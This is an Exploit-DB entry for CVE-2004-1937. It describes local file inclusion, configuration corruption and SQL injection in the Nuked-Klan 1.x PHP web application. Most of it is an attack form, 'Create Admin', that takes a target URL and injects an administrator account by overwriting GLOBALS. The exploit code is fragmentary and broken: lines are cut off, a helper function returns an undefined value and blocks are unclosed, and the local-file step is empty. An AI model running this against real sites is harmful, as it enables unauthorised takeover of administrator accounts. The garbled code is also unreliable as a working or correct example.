Nuked-Klan 1.x - Multiple Vulnerabilities

ID EDB-ID:23988
Type exploitdb
Reporter frog
Modified 2004-04-12T00:00:00


Nuked-Klan 1.x Multiple Vulnerabilities. CVE-2004-1937. Webapps exploit for php platform


Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

- Create admin (overwriting GLOBALS) :


<title>Nuked-KlaN b1.5 Create Admin</title>
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
return $ascii_char;

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
echo "<br><br><br><br>Admin should have been created.";


<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">